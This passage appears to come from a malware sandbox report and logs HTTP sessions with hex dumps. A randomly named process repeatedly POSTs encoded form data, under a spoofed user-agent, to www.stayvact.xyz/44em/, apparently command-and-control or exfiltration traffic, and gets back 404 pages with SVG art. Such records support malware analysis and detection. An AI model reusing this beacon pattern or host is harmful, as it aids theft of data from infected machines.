                                                                                                                                                    Oct 4, 2024 12:02:04.941277981 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 12:02:04.941349030 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 12:02:04.941406965 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 12:02:04.941466093 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 12:02:04.941529036 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    57192.168.11.2049789199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:10.137639999 CEST684OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 32 41 68 73 7a 73 36 51 4e 45 42 77 58 43 57 78 32 6b 6d 77 4a 67 37 30 75 43 44 53 2f 79 51 5a 6d 50 79 37 34 7a 68 52 52 72 79 50 35 6a 7a 4f 6d 4d 4a 4b 2f 4f 44 62 69 69 6d 37 51 72 2f 6a 53 4e 6b 44 6e 68 51 30 71 6e 66 76 7a 44 56 33 50 69 47 67 39 77 52 63 58 41 69 38 34 51 4b 4e 45 45 65 53 66 6b 2f 56 39 35 4c 4b 71 38 6e 7a 51 50 52 37 6e 57 66 36 46 61 44 38 72 53 38 6a 6e 49 6e 33 67 78 35 50 54 7a 57 74 67 45 4a 59 2f 42 70 37 54 2b 36 75 45 65 70 77 56 34 67 48 2f 38 63 77 50 53 68 73 72 47 6a 66 67 46 70 75 53 78 2f 61 42 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm2Ahszs6QNEBwXCWx2kmwJg70uCDS/yQZmPy74zhRRryP5jzOmMJK/ODbiim7Qr/jSNkDnhQ0qnfvzDV3PiGg9wRcXAi84QKNEEeSfk/V95LKq8nzQPR7nWf6FaD8rS8jnIn3gx5PTzWtgEJY/Bp7T+6uEepwV4gH/8cwPShsrGjfgFpuSx/aBQ==
                                                                                                                                                    Oct 4, 2024 12:02:10.336822033 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:10 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:10.336952925 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 12:02:10.336982012 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 12:02:10.337079048 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 12:02:10.337095976 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
                                                                                                                                                    Oct 4, 2024 12:02:10.337276936 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 12:02:10.337291956 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 12:02:10.337304115 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 12:02:10.337408066 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 12:02:10.337687016 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="
                                                                                                                                                    Oct 4, 2024 12:02:10.519228935 CEST1289INData Raw: 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: 269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="roun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    58192.168.11.2049790199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:12.840765953 CEST704OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 76 45 6d 57 71 78 73 46 45 59 46 6d 30 68 52 73 78 4b 79 51 61 55 42 7a 64 69 57 78 34 45 6d 30 4a 67 33 30 75 44 58 43 2b 41 6b 5a 6d 76 43 37 35 32 4e 52 63 4c 79 50 74 54 79 4b 70 73 4a 4e 2f 50 2f 54 69 6d 6d 37 51 72 72 6a 53 50 4d 44 6e 79 49 33 34 48 66 74 36 6a 56 31 4c 69 47 67 39 77 52 63 58 44 65 43 34 51 53 4e 46 30 4f 53 4f 31 2f 57 77 5a 4c 4a 36 73 6e 7a 48 66 52 2f 6e 57 66 4d 46 61 7a 57 72 52 45 6a 6e 49 33 33 6e 6b 55 5a 5a 7a 58 6d 76 6b 49 6e 79 41 59 77 64 4b 7a 64 4c 38 68 41 52 71 45 47 33 4b 4e 71 53 67 56 49 6f 56 2f 74 6b 31 51 47 51 7a 2b 42 63 62 78 38 30 51 78 52 54 72 69 55 55 35 4d 65 63 46 4e 4c 54 47 38 3d
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AkZmvC752NRcLyPtTyKpsJN/P/Timm7QrrjSPMDnyI34Hft6jV1LiGg9wRcXDeC4QSNF0OSO1/WwZLJ6snzHfR/nWfMFazWrREjnI33nkUZZzXmvkInyAYwdKzdL8hARqEG3KNqSgVIoV/tk1QGQz+Bcbx80QxRTriUU5MecFNLTG8=
                                                                                                                                                    Oct 4, 2024 12:02:13.048616886 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:12 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:13.048737049 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32
                                                                                                                                                    Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380
                                                                                                                                                    Oct 4, 2024 12:02:13.048852921 CEST1289INData Raw: 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                    Data Ascii: ="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="sta
                                                                                                                                                    Oct 4, 2024 12:02:13.048966885 CEST1289INData Raw: 31 33 35 22 20 79 31 3d 22 31 33 32 2e 37 34 36 22 20 78 32 3d 22 33 32 30 2e 31 33 35 22 20 79 32 3d 22 31 35 33 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65
                                                                                                                                                    Data Ascii: 135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" />
                                                                                                                                                    Oct 4, 2024 12:02:13.049119949 CEST1289INData Raw: 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20
                                                                                                                                                    Data Ascii: "10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945"
                                                                                                                                                    Oct 4, 2024 12:02:13.049236059 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x2="182.44" y2="
                                                                                                                                                    Oct 4, 2024 12:02:13.049264908 CEST1289INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73
                                                                                                                                                    Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-line
                                                                                                                                                    Oct 4, 2024 12:02:13.049330950 CEST1289INData Raw: 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33 30 35 2e 36 30 38 22 20 72 3d 22 32 2e 36 35
                                                                                                                                                    Data Ascii: 2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="u
                                                                                                                                                    Oct 4, 2024 12:02:13.049344063 CEST1289INData Raw: 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46
                                                                                                                                                    Data Ascii: 3.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.37
                                                                                                                                                    Oct 4, 2024 12:02:13.049402952 CEST1289INData Raw: 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35
                                                                                                                                                    Data Ascii: .66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="
                                                                                                                                                    Oct 4, 2024 12:02:13.230138063 CEST1289INData Raw: 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: 269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="roun


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    59192.168.11.2049791199.192.19.19801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:15.542889118 CEST5156OUTPOST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
